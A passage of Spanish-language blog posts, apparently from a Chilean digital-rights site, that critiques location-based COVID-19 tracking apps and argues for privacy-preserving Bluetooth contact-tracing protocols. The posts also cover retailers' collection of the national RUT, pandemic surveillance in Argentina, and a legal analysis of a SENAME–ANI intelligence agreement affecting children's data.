Actualmente, todos los celulares cuentan con un receptor GPS (Global Position System), lo que permite que puedan ser ubicados con un grado más o menos alto de precisión. Para lograrlo, nuestros teléfonos intercambian señales de radio con satélites en el espacio. El acceso a este componente y la lectura de la información que se puede obtener a partir de él, puede ser requerido por lxs desarrolladorxs móviles para el funcionamiento de cierta aplicación o incluso haga lecturas de manera frecuente cuando no estamos interactuando con esta, a esto se le llama background services (servicios en segundo plano). De esta manera pueden recolectar las ubicaciones de nuestro recorrido solo con tener instalada la aplicación.

Aunque precisa, esta tecnología tiene sus limitaciones. Por ejemplo, si una aplicación hace uso únicamente del GPS para la localización de sus usuarixs, sus datos tendrán un fallo que varía entre 10 y 100 metros. Uno de los factores que incrementa esta problemática se debe a barreras físicas que obstruyen la señal del satélite como casas, viviendas, edificios, construcciones, etcétera. Por eso, a veces tenemos problemas de localización cuando estamos en un estacionamiento subterráneo o en un edificio de varios pisos. Esto es una gran desventaja para todxs lxs usuarixs que se encuentren en zonas urbanas o densamente habitadas.

Además, las aplicaciones basadas en tecnología GPS tienen un reto adicional. Este componente tiene un alto consumo de energía para el teléfono. Por eso, la mayoría de teléfonos elige actualizar la ubicación con una frecuencia moderada y no constantemente. Así, emplear tecnología GPS para este tipo de aplicaciones requeriría encontrar un balance entre ambos para poder ser útil, teniendo en cuenta que no todos los dispositivos son iguales y un/a usuarix promedio probablemente decidirá borrar una aplicación que, sin estar abierta todo el tiempo, acaba rápidamente con la batería del teléfono.

Aplicaciones que utilizan la triangulación de antenas

Otro método que puede ser utilizado para obtener una ubicación relativa de un teléfono es hacerlo a través de la triangulación de antenas de red. Estas antenas son las que nos permite hacer llamadas, enviar mensajes de texto y conectarnos a Internet. Los teléfonos, incluso los que no «inteligentes» (conectados a Internet), constantemente envían señales a estas antenas, una acción que utiliza un consumo mínimo de energía.

La triangulación es posible porque estas antenas se conectan a una torre de red de nuestro operador, pero al mismo tiempo reciben las señales de otras torres, y luego de un procesamiento llamado triangulación se puede obtener una ubicación aproximada de los teléfonos. El fallo en este caso dependerá de la densidad de antenas alrededor de el/la usuarix, lo que significa que a más antenas habrá mayor precisión. A diferencia de la tecnología GPS, las zonas más pobladas serían las más beneficiadas, pero por desgracia en zonas alejadas o semi-urbanas, el fallo puede llegar a ser mayor a 500 metros, lo que hace prácticamente inservible el rastreo.

GPS y triangulación no son tecnologías apropiadas

Una aplicación que utilice la geolocalización como base tecnológica tendrá muchos problemas para determinar con un grado alto de confiabilidad el desplazamiento de personas que fueron diagnosticadas positivamente, qué lugares exactamente frecuentaron, por cuánto tiempo y quiénes estuvieron en contacto con ellas. Incluso asumiendo que todxs lxs posibles afectadxs tienen instalada la aplicación, llevan su teléfono a todos lados y no se les acabó la batería durante todo el día.

Tal vez lo que sí puede hacer una aplicación basada en GPS o localización por triangulación de antenas es definir geo-cercas o polígonos espaciales. De esa manera, podría ofrecerse a lxs usuarixs de este tipo de aplicación es si un/a usuarix está cerca o ha ingresado a estas zonas donde se ha identificado una afluencia grande de contagiadxs.

De hecho, esto último podría funcionar bien para saber qué distritos y zonas están acatando correctamente la cuarentena. Sin embargo, para tener esta información no sería necesario desarrollar una aplicación ni obligar a las personas a descargarla y mantenerla activa, ya que esos datos pueden ser ofrecidos por las empresas de telecomunicaciones como un producto, tal como el desarrollo empresarial Smart Steps de Telefónica. Esta opción también fue propuesta por representantes del Comando Covid-19 para monitorizar aglomeraciones pero hasta la fecha no existe evidencia que se haya implementado o hecho algún requerimiento de este tipo. Por supuesto, quedaría pendiente conocer las medidas para mitigar posibles afectaciones a la privacidad.

Sí es posible crear aplicaciones contra la pandemia mientras respetan nuestra privacidad

Publicada el 25/05/2020 por Anonymous Chile

La política de los datos sí importa, determina la forma en que podremos o no vivir en un espacio más libre en un futuro próximo

La semana pasada nos convocaron a conversar en la Escuela de Activistas de la organización Ingeniería Sin Fronteras Euskadi. De esa plática sobre Vulneración de derechos digitales en un estado de alarma global salieron varias reflexiones que trascendían los propios derechos digitales a la vez de permanecer vinculados a ellos.

Controlar la pandemia ha propuesto como solución de ¿corto plazo? la ‘necesidad’ de ceder derechos y libertades, en particular la privacidad, libertad de expresión y de reunión, a cambio de estar ‘a salvo’.

Los gobiernos de todo el mundo corrieron [más o menos rápido, según el caso] a buscar en la tecnología una aliada que permita ayudar en esa detención ‘de la pandemia’. Tal y como están diseñadas esas nuevas tecnologías lo que están controlando es a su ciudadanía. Aquí un listado de las aplicaciones de seguimiento por Coronavirus en mundo.

Se está manejando la crisis desde la amenaza. Estar aisladas en casa la mayor cantidad de tiempo posible es la única medida posible, al parecer. Estamos en soledad y con miedo. La narrativa de la crisis profundiza psicológicamente la idea de que estar con otras personas es peligroso, el/la vecina como enemiga, apoyando la ruptura del ya debilitado tejido social en el que estamos sumergidos desde hace décadas.

En el segundo episodio de System Update, el periodista Glenn Greenwald se centra en las ramificaciones no-exploradas de las decisiones políticas que tomamos de forma masiva para responder a la crisis. Brinda un panorama 360° sobre la crisis al tratar el tema de los derechos digitales, las afectaciones sociales, culturales, políticas y psicológicas de la misma y cómo lo que comemos [la industrialización de la ganadería y la agricultura extensiva] influyen en la propagación de epidemias.

Además, resuena una reflexión histórica en nuestras cabezas. Las acciones tomadas tras el 11S nos demuestran que los poderes extraordinarios y ‘temporales’ otorgados para ‘controlar’ la crisis no han dejado de existir casi 20 años después. ¿Vivimos entonces en un estado permanente de alarma global? Dice Gleenwald, ‘seamos realistas, reconozcamos que esos poderes, incluso si realmente queremos que sean temporales es altamente probable que no lo sean’. Por eso las decisiones que tomamos sobre cómo afrontar los riesgos de hoy tendrán repercusiones en el futuro. Lo que aceptemos como normal ahora, puede ser la norma de ahora en adelante.

En ese sentido, ¿puede la tecnología tener un rol protagónico y de apoyo al control de expansión de la pandemia respetando derechos y libertades? Sí puede. Es una decisión política no hacerlo.

Las tecnologías condensas siglos de conocimiento en técnica, matemática, ingeniería, física, electrónica, lingüística, relaciones humanas, laborales, naturales. El brillo de los aparatitos [y las patentes] invisibilizan el cúmulo de conocimiento allí alojado. Esas relaciones entre ciencia y política pueden ser desarrolladas de una forma o de otras. Para la vigilancia y el control [que es el camino actual que adoptaron gobiernos y corporaciones] o para el beneficio social [que es el camino propuesto por diversos espacios de sociedad civil].

¿Cómo es posible crear tecnologías que tomen la privacidad por diseño en el desarrollo de las tecnologías de seguimiento? Desde el Caos Computer Club compartieron un decálogo para evaluar las aplicaciones de seguimiento basado en la voluntariedad en la entrega de datos, anonimato de los mismos, transparencia, descentralización, economía de datos [extraer solo los necesarios]. Mientras tanto, Xnet compartió un artículo en el que, además de hacer hincapié en la apertura del código y la transparencia enfoca en la posibilidad no explorada por gobiernos de la cooperación ciudadana y el big data para el bien común. Ese último concepto, tan dialogado en las comunidades de derechos digitales, tiene una oportunidad histórica para ser ejercido. Hacer «un uso de los datos masivos de la población siempre que sean anonimizados y abiertos para que no solo gobiernos y corporaciones, sino también la ciudadanía puedan usarlos, no solo es positivo, sino que es el futuro. El big data debe estar supeditado a reglas democráticas: debe ser un bien común al servicio de la ciencia e innovación ciudadanas y no un bien privativo de gobiernos y corporaciones».

¿Entonces sí pueden congeniarse salud pública y derechos digitales? En las últimas semanas encontramos comunidades tecnológicas en defensa de la privacidad y la criptografía trabajando ‘con un espíritu de colaboración radical’ en protocolos basados en este principio: «es de vital importancia evitar la creación de una nueva infraestructura de vigilancia que dé más poder a las mismas instituciones cuyos fallos contribuyeron a la crisis». Los dos protocolos que están posicionándose respecto al tema son el TCN/CEN impulsado por la fundación estadunidense Zcash, Co-Epi y Covid-Watch; el otro es llamado protocolo DP3-T y está siendo trabajado por investigadores de ocho universidades europeas.

Ambos protocolos son muy similares en su diseño y proponen tres fases para el rastreo del virus: emisión, informe y escaneo. Se propicia el rastreo descentralizado de los contactos mediante transmisiones por Bluetooth de los dispositivos móviles de los usuarios que no revelan información sobre la identidad o el historial de ubicación de las personas usuarias. Luego, si esas personas desarrollan síntomas o dan positivo en un testeo, pueden enviar un informe subiendo un paquete con ciertos datos a un servidor. Unas terceras personas supervisan los datos publicados por el servidor, quien avisa a los dispositivos que hayan estado en contacto con ese dispositivo sobre la situación de salud. Algo así como “has estado en contacto con una persona que dio COVID-19 positivo”, sin decir quién o dónde. Si lo que necesitamos es rastrear el patrón de movimiento del virus, no necesitamos rastrear el de las personas.

Se publicó un artículo que compara ambos protocolos en un ‘esfuerzo por lograr que ambos protocolos se unan en un estándar común’. Detalla las características de ambos sobre cómo responden a las cualidades deseables: servidores respetuosos de la privacidad, integridad de la fuente y la difusión [enviar informes solo a los dispositivos con los que se ha estado en contacto y no masivamente], sin seguimientos automáticos, privacidad del receptor y del emisor [ninguna de las dos partes tiene la posibilidad de revelar información diferente a la que pudiera ser útil para combatir la pandemia].

En pocas semanas se avanzó veloz en protocolos de rastreo de contactos descentralizados y con preservación de la privacidad. Aún es necesario atender a ciertos aspectos que garanticen esa privacidad en todos sus tramos y sin embargo se hace esperanzador que el trabajo colaborativo dé como resultado tangible la posibilidad de aplicaciones de rastreo seguro que sirvan a los momentos actuales sentando precedentes positivos sobre la posibilidad de una tecnología de no-vigilancia.

Este palabrerío está explicado de forma amena en una historieta realizada por Nick Case y traducida por Vanesa Sánchez Cortés al castellano que encontrarán completa al final de la entrada.

Mientras tanto, ¿sería posible para los gobiernos latinoamericanos adoptar estas tecnologías? Conocimiento hay. Grupos de personas que desarrollan tecnología localmente también. Y, como bien han demostrado hasta ahora, ciertos recursos para invertir en ello, también. ¿Por qué entonces no pensar que el dinero público puede ser invertido en grupos locales y/o no-corporativos que sustentan valores democráticos al intentar refrenar la pandemia?

En resumen, es tecnológicamente posible desarrollar protocolos transparentes; proporcionales [que obtengan datos centrados en el seguimiento al virus, no a las personas]; de código abierto, libre y descentralizado; manteniendo la privacidad y anonimato de las personas y que se desarrolle de manera transdisciplinar, colaborativa, para que tome en consideración recabar solo los parámetros científicamente necesarios durante la crisis sanitaria.

La política de los datos sí importa, determina la forma en que podremos o no vivir en un espacio más libre en un futuro próximo. Esfuerzos académicos, civiles y hackers demuestran ‘con datos duros’ que respetar nuestras libertades es posible si hay una decisión política de fondo. ¿Gobiernos y corporaciones escucharán? Como quiera que sea, desde los espacios sociales tenemos a la mano argumentos sólidos que nos permiten movernos del ‘no hay nada que podamos hacer’. Podemos, como mínimo, informarnos sobre las opciones y exigir[nos] actuar en favor de una tecnología que nos permita ampliar nuestras libertades colectivas.

5 comentarios

¿Somos un producto? Campaña devuelve el debate sobre el R.U.T.

Publicada el 22/05/2020 - 01/08/2021 por Anonymous Chile

Al entregar el RUT, las empresas crean un perfil personal con tu comportamiento y privacidad, información que posteriormente es convertida en una base de datos comercial que otras empresas compran para evaluar tu salud, educación o economía. Tú eres el producto.

La moderna vida de la señora Rut

Es muy común en nuestra vida cotidiana que nos pidan el número de identificación cada vez que vamos a adquirir un producto. Para convencernos, nos dicen que dar el RUT sirve como una herramienta de fidelización que nos otorga un beneficio, por ejemplo, acceder a descuentos y promociones exclusivas, o acumular puntos. Pero la verdad es que el interés por nuestra información va más allá de entregarnos un “premio”, en realidad lo que buscan es hacer perfiles de clientes que nos transforman en un producto.

No solo estamos entregando nuestro Rut, también estamos permitiendo el cruce de información.

Los datos que las empresas obtienen de nosotros, les permiten realizar informes completos de nuestra calidad de vida y comportamientos, lo que deriva en la elaboración de perfiles más detallados y acabados de nuestros gustos, intereses e intimidad. De esta forma, los comercios pueden ir realizando campañas cada vez más personalizadas para sus distintos públicos, así por ejemplo, ciertas empresas pueden saber, incluso, antes que nosotros mismos, qué tipos de enfermedades padecemos, qué productos podrían ser atractivos para nosotros, e incluso saber si una mujer se encuentra posiblemente embarazada, aún cuando ella todavía no lo haya notado. ¿Por qué? porque usan algoritmos que predicen con certeza.

Dos veces al mes compartiremos contigo las viñetas de la señora Rut y te instamos a contarnos tus propias experiencias en este tema. ¿Han utilizando tus datos para ofrecerte algo que te produjo sorpresa? ¿Te asombraste cuando adquiriste algo y luego en tus redes sociales aparecían más y mejores ofertas para el mismo producto? Cuéntanos y podrás ver tus historias graficadas en la vida de la señora Rut.

¿Qué buscamos con esto?

Queremos emplazar a las empresas y comercios a que manifiesten claramente la finalidad que tienen para solicitar nuestros datos personales. Exigimos que se informe en forma clara sobre los propósitos que tienen para solicitar el RUT, y con quienes se compartirá ese dato, de modo que cumplan con las exigencias actuales del artículo 4º de la Ley 19.628.

Un poco de historia…

El número de identificación nacional en Chile ha sido utilizado desde los años 30’, momento en que se dictó la Ley Orgánica del Servicio de Registro Civil. Su creación tenía el único objeto de acreditar la identidad de las personas. Desde su formación estuvo directamente vinculado al Registro Civil, organismo al que le correspondía exclusivamente el registro de ciertos hechos que servían como fuente del estado civil de las personas.

La finalidad con la que surgió el número de identificación nacional cambió con la implementación del Rol Único Tributario, en 1969. En el caso de las personas naturales el rol único nacional, asignado por el Servicio de Registro Civil, pasó también a tener la función de identificar a las personas como contribuyentes ante el Servicio de Impuestos Internos.

Es distinto en el caso de las personas jurídicas: empresas, sociedades y organizaciones sin fines de lucro. Para ellos, su número de identificación es asignado solamente por el Servicio de Impuestos Internos.

Privacidad en cuarentena

Publicada el 21/05/2020 - 01/08/2021 por Anonymous Chile

El 31 de diciembre de 2019, en Wuhan (China), fue notificado por primera vez el brote de enfermedad por coronavirus a la Organización Mundial de la Salud (OMS). Desde entonces, el virus no se detuvo y se expandió a distintos puntos del mundo hasta convertirse en una pandemia que, al día de hoy, se encuentra presente en casi todo el mundo con millones de casos confirmados. En consecuencia, se establecieron dos medidas a nivel global que se consideraron las más efectivas para contrarrestar su avance: el aislamiento y el distanciamiento físico. Teniendo en cuenta esto, países como China y Corea del Sur comenzaron a utilizar sus sistemas de vigilancia para hacer cumplir estas y otras medidas para combatir la propagación del virus. A raíz de esto, el despliegue del uso de tecnología para combatir y afrontar el avance del virus cruzó fronteras y llegó a Europa, Australia, Estados Unidos) y varios países de América Latina, incluyendo a la Argentina. Así, se conocieron desarrollos de tecnologías varias, algunas de Inteligencia Artificial, con diversos objetivos: detección y seguimiento de la población y la evaluación de los riesgos de infección, entre otros.

En el caso de la detección de la población el objetivo es identificar quién podría estar enfermo -debido a si estuvo en contacto con otras personas infectadas o si acababa de estar en algún país que ya tenía casos de coronavirus- para contener el avance del contagio. En este caso, algunas aplicaciones utilizan la información sobre el tiempo que las personas pasan en un lugar en particular y sobre la cantidad de infecciones que ocurren allí para que los científicos puedan crear modelos espaciales que representan la evolución de los contactos entre las personas infectadas, y así capturar cómo evoluciona la transmisión). Por otro lado, las aplicaciones de evaluación de los riesgos de infección son, además de para identificar posibles casos, para descomprimir el sistema de salud de cada ciudad y evitar aglomeraciones de personas en lugares donde los contagios son más probables.

Algunas de las tecnologías de IA que se están desarrollando para manejar el avance del COVID-19 en distintos países del mundo: control de la población; aplicaciones de evaluación de riesgo; dispositivo que permite monitorear la frecuencia respiratoria de pacientes con COVID-19 de manera remota); un sistema de IA para analizar miles de trabajos de investigación -publicados con acceso abierto para facilitar los avances en la investigación y el trabajo colaborativo- sobre los efectos del virus en la salud, posibles tratamientos y la dinámica de la pandemia); IA para la detección y eliminación automáticas de “fake news” o campañas de desinformación relacionadas con el virus publicadas en redes sociales como Facebook; entre otras.

Todo sistema de machine learning necesita cargarse de datos para analizar y poder establecer predicciones, categorías o tomar decisiones. Aplicaciones como las de detección de la población y las de evaluación de los riesgos de infección solicitan algunos de los siguientes datos y permisos para acceder a datos que registra y almacena el dispositivo móvil: datos personales (que permitan identificar y ponerse en contacto con cada ciudadano que se registre); datos de ubicación; acceso a micrófono y cámara del dispositivo; datos de tráfico; datos de salud y datos biométricos.

En este sentido, es fundamental que en cada país en que se implementen tecnologías que almacenen y analicen esta cantidad y tipos de datos, las autoridades se aseguren de que el intercambio de datos se ajuste a las normas de privacidad y no genere riesgos de que los datos de las personas sean mal utilizados. Para evitar esto último, desde diversos sectores defensores del derecho a la privacidad -organizaciones de la sociedad civil y académicos- sostienen que estas tecnologías que recolectan datos personales, de salud, biométricos y de ubicación, deben ser medidas de excepción, limitadas en el tiempo, usadas sólo bajo estricta necesidad, implementadas en absoluta transparencia y eliminadas ni bien pase la razón que justificó su uso, con la consiguiente destrucción de registros que permitan o habiliten discriminación o afectación de derechos de las personas. Los posibles riesgos e impactos sociales que se identifican del uso de estas tecnologías, que muchas veces es opaco, son: Discriminación arbitraria, vulneración de la privacidad, y censura arbitraria de información.

En Argentina, el 20 de marzo de 2020 comenzó a regir el Decreto de Necesidad y Urgencia 297/2020 firmado por el presidente Alberto Fernández, a través del que aprobó la medida de “Aislamiento social, preventivo y obligatorio”. El lunes 23 de marzo la Secretaría de Innovación Pública que depende de Jefatura de Gabinete de la Nación, presentó un formulario publicado en la web y una aplicación bajo el nombre de “Autoevaluación de síntomas de Coronavirus COVID-19”. El lunes 27 de abril se lanzó una actualización de esta aplicación -debido a las fallas técnicas y de diseño que se habían cuestionado-, llamada CuidAR que, para registrarse es necesario habilitar la geolocalización e ingresar el DNI: “El objetivo de esta segunda versión es permitir la autoevaluación de síntomas en pocos pasos y sumar la posibilidad de añadir al Certificado Único Habilitante de Circulación (CUHC), un código que muestra que el ciudadano o la ciudadana está habilitado/a para movilizarse, siempre y cuando en el autoexamen no se detecten síntomas de Covid-19. En el caso de existir síntomas compatibles, la información llega a los comités de emergencia de salud de cada provincia para que se contacten con el usuario y reciba atención médica”, explican en Ámbito. Además, “una vez que la persona manifiesta síntomas, la app advierte que debe permanecer totalmente aislado y si posee un certificado de circulación se inhabilita.”

Por su parte, la empresa Urbetrack desarrolló “Cuidate en casa”, otra aplicación disponible para los sistemas operativos iOS y Android que utiliza la tecnología del GPS para alertar si la persona no cumple con el aislamiento obligatorio. Algo similar decidió la Justicia en Santa Fe, para las personas que hubieran incumplido con el aislamiento obligatorio en las ciudades de Santa Fe y Rosario, que deberán instalar obligatoriamente la aplicación en sus celulares. Otra medida de carácter obligatorio fue tomada a mediados de abril en Tierra del Fuego, donde, además de que se limitó el tiempo para salir a realizar compras a tres horas, se instaló un sistema de monitoreo con un código QR que está en verde si la persona que está circulando está dentro del periodo permitido y que se pone en rojo si se le venció ese tiempo. En el caso de los datos y permisos solicitados, también resultan desproporcionados en cuanto al objetivo que debería alcanzarse, que es el cumplimiento del aislamiento y distanciamiento físico de la población.

A mediados de abril, desde el Ministerio de Seguridad de la Nación, a cargo de Sabina Frederick, se anunció que se iba a utilizar el llamado “ciberpatrullaje” -que su nombre preciso es inteligencia de fuentes abiertas y de redes sociales, tales como Facebook o Twitter- para medir el “humor social” y, luego, para prevenir delitos.

El sitio Pandemic Big Brother, lanzado por diversas organizaciones internacionales, mapea las etapas de restricción de los derechos digitales (vigilancia, censura, control de comunicaciones, etc.) de las tecnologías implementadas en distintos países del mundo. En este sentido, y a raíz de los anuncios de distintos gobiernos y empresas sobre la implementación de tecnologías digitales para combatir el avance de la pandemia COVID-19 -como es el caso del uso de datos de ubicación, por ejemplo-, once organizaciones de la sociedad civil de América Latina, organizadas en el consorcio Al Sur, publicaron un documento en el que, “reconociendo la gravedad de esta crisis de salud y la posibilidad legal de los gobiernos de tomar medidas excepcionales con el fin de controlar la pandemia”, piden a los gobiernos que los usos de esas tecnologías se lleven a cabo “en estricta conformidad con las normas de derechos humanos”.

Por su parte, la Fundación Sadosky publicó un artículo institucional el 30 de marzo en el que piden ser cautos en el uso de tecnologías de Inteligencia Artificial -y, en un mensaje que dirigen a los medios de comunicación, también piden ser cautos con la difusión de estas aplicaciones- y advierten sobre los riesgos de aplicar este tipo de tecnología cuando no se realiza con responsabilidad. Desde Fundación Sadosky sostienen que “la inteligencia artificial es una herramienta con mucho potencial y aplicable a las más diversas áreas, pero requiere acceso a datos confiables, revisiones y pruebas para evitar sesgos, y más aún, como cualquier dispositivo aplicado a la salud, requiere de homologaciones y aprobación por los organismos de control que aseguren su idoneidad y fiabilidad”. Además, consideran que, si no se utiliza de manera crítica, “podría incurrirse en conclusiones falaces, toma de decisiones erróneas, crear angustia y preocupaciones innecesarias”. Finalmente, en abril de 2020, 124 organizaciones de la sociedad civil publicamos una Declaración conjunta: “Los Estados deben respetar los derechos humanos al emplear tecnologías de vigilancia digital para combatir la pandemia”.

Luego de hacer el repaso sobre las tecnologías implementadas, resultaría fácil llegar a la conclusión de que es imposible implementar tecnologías de Inteligencia Artificial que permitan contener el avance de la pandemia y, asimismo, garantizar privacidad. Sin embargo, especialistas en tecnología y protección de datos aseguran que plantear una dicotomía insalvable entre el estado de derecho y la salud pública es una falacia.

SENAME vulnera la privacidad al firmar contrato de vigilancia con la ANI

Publicada el 21/05/2020 - 01/08/2021 por Anonymous Chile

Hace algunas horas fue difundido a través de redes sociales el convenio suscrito en 2019 entre el Servicio Nacional de Menores (SENAME) y la Asociación Nacional de Inteligencia (ANI).

Dicho convenio se fundamentaría en el principio de colaboración y coordinación entre los organismos públicos establecido en la Ley Orgánica Constitucional de Bases Generales de la Administración del Estado; en el artículo 8 letra e) de la Ley 19.974 sobre el sistema de inteligencia del estado y que crea la Agencia Nacional de Inteligencia, que faculta a requerir a todos los servicios de la Administración del Estado los antecedentes e informes que estime necesarios para el cumplimiento de sus objetivos; y, finalmente en el Acuerdo Nacional por la Seguridad Pública, el cual consideraría imperativo avanzar hacia un sistema moderno, integrado y funcional de inteligencia, que considere la incorporación y participación de todos los organismos e instituciones relevantes, y que permita una acción preventiva y eficaz ante las nuevas amenazas de seguridad internas y externas.

Sin embargo, dicho Convenio no es coherente con nuestro ordenamiento jurídico ni tampoco con los acuerdos nacionales propuestos por el mismo gobierno del Presidente Sebastián Piñera por las siguientes razones:

  • Los objetivos del convenio no se ajustan a los objetivos de ninguna de las dos instituciones, por lo cual no parece justificarse su necesidad.
  • El convenio presenta incumplimiento de regulación vigente, incluso de garantías constitucionales, en relación a la protección de datos personales y datos sensibles de niñas, niños y adolescentes, tanto por lo abierto de sus planteamientos generales como por el acceso a sistemas que contendrían dichos datos.
  • La iniciativa pareciera estar motivada por razones políticas, dado el contexto de movilizaciones estudiantiles, y en la práctica puede restringir libertades y garantías, sometiendo a una vigilancia permanente, discriminación y estigmatización a quienes merecen y necesitan especial protección por parte del Estado.

Sobre la Agencia Nacional de Inteligencia y el Servicio Nacional de Menores

La Ley 19.974 regula toda la actividad de inteligencia y contrainteligencia que puedan realizar los órganos y servicios que integren el Sistema de Inteligencia del Estado. De esta forma, los organismos y servicios de inteligencia como la ANI deben limitarse al cumplimiento de sus objetivos y funciones, acorde a la Constitución y a las leyes de nuestro país, tal como lo establece su artículo 3º.

En relación a los objetivos, la Ley establece en su artículo 4º que los objetivos del Sistema de Inteligencia del Estado, dentro del que está comprendida la ANI, son principalmente los de proteger la soberanía nacional y preservar el orden constitucional, y la formulación de apreciaciones de inteligencia útiles para la consecución de los objetivos nacionales. En particular, el objetivo de la ANI es el de producir inteligencia para asesorar al Presidente de la República y a los diversos niveles superiores de conducción del Estado, siempre en el marco de la ley 19.974.

Por su parte, la Ley Orgánica del SENAME, fijada por el Decreto Ley N° 2.465, de 1979, establece que el principal objetivo de dicho organismo es contribuir a proteger y promover los derechos de los niños, niñas y adolescentes que han sido vulnerados en el ejercicio de los mismos y a la reinserción social de adolescentes que han infringido la ley penal. Así como también diseñar y mantener una oferta de programas especializados destinados a la atención de dichos NNA, así como estimular, orientar, supervisar y fiscalizar, técnica y financieramente la labor que desarrollen las instituciones públicas o privadas que tengan la calidad de colaboradores acreditados.

El Convenio se aleja de las finalidades de la ANI y SENAME

De la lectura del Convenio no es posible desprender que a partir de éste se busque cumplir con los objetivos que la ley ha establecidos tanto para la ANI como para el SENAME. En relación a la ANI, este debiera estar relacionado a la producción de inteligencia para asesorar al Presidente de la República y a los diversos niveles superiores de conducción del Estado, ya sea para proteger la soberanía nacional, preservar el orden constitucional o para la consecución de los objetivos nacionales.

En el caso del SENAME, el Convenio debiera ser conducente a contribuir a proteger y promover los derechos de los niños, niñas y adolescentes. El Convenio no parece ir en la dirección de esos objetivos, sino por el contrario se encuentra en la lógica de entender a niños, niñas y adolescentes como amenazas de la seguridad interna y externa del país.

En este sentido, uno de los fundamentos del Convenio recaería en el Acuerdo por la Seguridad Pública, por el cual sería “imperativo avanzar hacia un sistema moderno, integrado y funcional de inteligencia, que considere la incorporación y participación de todos los organismos e instituciones relevantes, y que permita una acción preventiva y eficaz ante las nuevas amenazas de seguridad internas y externas.” Sin embargo, la implementación práctica de dicho acuerdo ha de ser de conformidad a nuestro ordenamiento jurídico y a nuestra Constitución, tomando en particular consideración que este contempla medidas que pueden establecer limitaciones y restricciones a las garantías fundamentales de las personas.

En relación a esto último, en ningún caso puede extenderse la implementación de dicho acuerdo a toda institución del Estado mucho menos cuando aquellas tienen objetivos distintos a los de seguridad pública, y cuando puedan ser contrarias a las atribuciones y fines que la ley les otorga, como en el caso del SENAME cuyo objetivo principal es la protección y promoción de los derechos de los niños, niñas y adolescentes.

Ambas instituciones señalan que otro de los fundamentos para la suscripción de este acuerdo ha sido el de “intercambiar información y a aunar esfuerzos para realizar un trabajo conjunto, a fin de contribuir al logro de una mejor y más eficiente gestión en el cumplimiento de las funciones privativas que la ley les encomienda a ambas instituciones.” Sin embargo, las medidas deben ser acordes a sus objetivos, lo que no se desprende de ninguno de estos puntos.

Las preguntas sin resolver son la siguientes: ¿Qué información que maneja SENAME y que pueda proveer a la ANI sería necesaria para proteger la soberanía nacional y mantener el orden constitucional? ¿Este convenio es acorde a los fines de promoción y protección de los derechos de NNA? ¿De qué manera los beneficia?

Aquellas preguntas sin resolver impiden desprender que los objetivos del Convenio sean acordes a las finalidades de cada una de estas instituciones.

Sobre el Objeto del Convenio

En los fundamentos del Convenio se alude al artículo 8 letra e) de la Ley Nº 19.974, conforme a ella, la ANI podrá requerir a los servicios de la Administración del Estado “los antecedentes e informes que estime necesarios para el cumplimiento de sus objetivos”. Sin embargo, posteriormente en los objetivos del Convenio se señalan otros distintos a los de requerir antecedentes e informes, tal como se desprende en las literales a), b) y c) de su cláusula tercera, que señala lo siguiente:

1. En relación a la literal a), esta se relacionaría a la función de la ANI mencionada en la literal a) del artículo 8 de la Ley 19.974, a saber, la de “[r]ecolectar y procesar información de todos los ámbitos del nivel nacional e internacional, con el fin de producir inteligencia y de efectuar apreciaciones globales y sectoriales, de acuerdo con los requerimientos efectuados por el Presidente de la República.” Al respecto, y tal como se mencionó previamente la limitación de esta medida debe en todo caso ser coherente con el objeto legal establecido tanto para el Sistema de Inteligencia Estatal como de la ANI, lo que no se cumpliría en este caso. Adicionalmente, el acceso a la información en poder del SENAME es una medida que no establece restricción alguna, siendo sumamente amplia en cuanto a su alcance.

2. En el caso de la literal b) esta se relacionaría con la literal c) del artículo 8 de la Ley 19.974, a saber, la de “[p]roponer normas y procedimientos de protección de los sistemas de información crítica del Estado.” Respecto a este punto, si bien no existe en Chile una definición a sistemas de información crítica del Estado, la Política Nacional de Ciberseguridad señala que “[d]entro de las infraestructuras de la información, existe un conjunto especialmente relevante para la marcha del país, las denominadas infraestructuras críticas de la información (ICI), que comprende las instalaciones, redes, servicios y equipos físicos y de tecnología de la información cuya afectación, degradación, denegación, interrupción o destrucción pueden tener una repercusión importante en la seguridad, la salud, el bienestar de los ciudadanos y el efectivo funcionamiento del Estado y del sector privado.” En relación a ello, si bien los sistemas de información del SENAME se podrían considerar como sistemas de información crítica debido a que en ellos podrían tener repercusión el bienestar de Niños, Niñas y Adolescentes, es necesario señalar que la promoción de normas y procedimientos de protección de los sistemas de información del SENAME pueden ser realizados por otras instituciones, toda vez que el principal objetivo de ello sería la protección y promoción de los derechos de los niños, niñas y adolescentes, y no -como ocurre en este caso- la protección de la soberanía nacional o el orden constitucional.

3. Por último, en cuanto al literal c) al igual que el resto de los objetivos descritos en el Convenio, la ambigüedad y amplitud del objetivo no permite delimitar su finalidad con precisión, incluso parece exceder las atribuciones establecidas en el artículo 8 de la Ley 19.974, y en ese sentido, resulta aún más difícil comprender la justificación real de la medida.

En relación a estos tres objetivos del Convenio, es posible a su vez desprender que en ningún caso se hace alusión a la protección y promoción de los derechos de los NNA, sino por el contrario, todos dicen relación con las funciones y actividades de inteligencia y contrainteligencia de la ANI, de modo que reiteramos que la suscripción de este Convenio no parece beneficiar en algún modo concreto a los NNA que se encuentran bajo la protección del SENAME.

Adicionalmente, es necesario señalar que la Ley 19.974 no es una carta abierta para que la ANI pueda llevar a cabo toda actividad de inteligencia o contrainteligencia, sino por el contrario, esta debe restringirse tanto a la Ley como al respeto irrestricto a las garantías constitucionales.

Recolección de Datos Personales de NNA

Conforme a los objetivos del Convenio, y a los fundamentos mencionados en el mismo, no es posible establecer una limitación respecto de la información a la que podrá acceder la ANI, si bien, dentro de sus fundamentos se consideraría la letra e) del artículo 8 de la Ley 19.974, la medida se extendería más allá del requerimiento de antecedentes e informes, ya que podría también entenderse el acceso constante a toda información que pueda poseer el SENAME en sus sistemas de información. Independiente de ello, en ambos casos existe el riesgo de que la ANI acceda a datos personales, e incluso datos sensibles de niños, niñas y adolescentes.

Al respecto, el artículo 3º de la Ley 19.974 prescribe que “los organismos y servicios de inteligencia y sus integrantes deberán sujetarse siempre, en el cumplimiento de sus objetivos y funciones, a la Constitución Política y a las leyes de la República”. En este sentido, el artículo 19 Nº 4 de la Constitución garantiza la protección de los datos personales a nivel constitucional, señalando a su vez que el tratamiento y protección de estos datos se debe efectuar en la forma y condiciones que establece la ley.

